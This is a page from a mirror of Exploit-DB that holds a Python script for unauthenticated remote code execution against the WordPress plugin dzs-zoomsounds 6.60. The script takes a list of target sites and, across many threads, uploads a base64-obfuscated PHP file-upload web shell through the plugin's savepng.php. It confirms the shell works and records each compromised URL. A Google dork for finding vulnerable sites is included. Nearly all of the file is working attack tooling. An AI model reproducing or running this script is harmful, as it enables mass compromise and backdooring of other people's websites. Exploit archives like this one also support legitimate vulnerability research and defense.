bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50753.py
Offensive Security f2d7e05ad0 DB: 2022-02-19 
17 changes to exploits/shellcodes

Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path
Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path
Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path
Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path
TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path
Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path
Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path
File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path
Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path
WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
WordPress Plugin dzs-zoomsounds 6.60 - Remote Code Execution (RCE) (Unauthenticated)
Hotel Druid 3.0.3 - Remote Code Execution (RCE)
Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)

Solaris/SPARC - setuid(0) + chmod (/bin/ksh) + exit(0) Shellcode
Solaris/SPARC - chmod(./me) Shellcode
Solaris/SPARC - setuid(0) + execve (/bin/ksh) Shellcode
Linux/MIPS - N32 MSB Reverse Shell Shellcode
2022-02-19 05:01:36 +00:00

111 lines
No EOL
4.2 KiB
Python
Executable file
Raw Blame History

# Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: inurl:wp-content/plugins/dzs-zoomsounds
# Date: 16/02/2022
# Exploit Author: Overthinker1877 (1877 Team)
# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
# Version: 6.60
# Tested on: Windows / Linux
import os
import requests
import threading
from multiprocessing.dummy import Pool,Lock
from bs4 import BeautifulSoup
import time
import smtplib,sys,ctypes
from random import choice
from colorama import Fore
from colorama import Style
from colorama import init
import re
import time
from time import sleep
init(autoreset=True)
fr = Fore.RED
gr = Fore.BLUE
fc = Fore.CYAN
fw = Fore.WHITE
fy = Fore.YELLOW
fg = Fore.GREEN
sd = Style.DIM
sn = Style.NORMAL
sb = Style.BRIGHT
Bad = 0
Good = 0
def Folder(directory):
if not os.path.exists(directory):
os.makedirs(directory)
Folder("exploited")
def clear():
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except:
pass
def finder(i) :
global Bad,Good
head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'}
try :
x = requests.session()
listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php']
for script in listaa :
url = (i+"/"+script)
while True :
req_first = x.get(url, headers=head)
if "error:http raw post data does not exist" in req_first.text :
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}
burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>"
requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45)
urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php")
req_second = x.get(urlx, headers=head)
if "Overthinker1877" in req_second.text :
Good = Good + 1
print(fg+"Exploited "+fw+">> "+fg+" = "+urlx)
with open("exploited/shell.txt","a") as file :
file.write(urlx+"\n")
file.close()
else :
Bad = Bad + 1
print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit")
else :
Bad = Bad + 1
print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln")
pass
break
except :
pass
if os.name == 'nt':
ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad))
else :
sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad))
def key_logo():
clear = '\x1b[0m'
colors = [36, 32, 34, 35, 31, 37]
x = ' [ + ] OVERTHINKER1877 EXPLOIT'
for N, line in enumerate(x.split('\n')):
sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear))
time.sleep(0.05)
def process(line):
time.sleep(1)
def run() :
key_logo()
clear()
print("""
[-] -----------------------------------------[-]
[+] WwW.1877.TeaM
[-] -----------------------------------------[-]
\n \n""")
file_name = input("Website List : ")
op = open(file_name,'r').read().splitlines()
TEXTList = [list.strip() for list in op]
p = Pool(int(input('Thread : ')))
p.map(finder, TEXTList)
run()
Reference in a new issue View git blame Copy permalink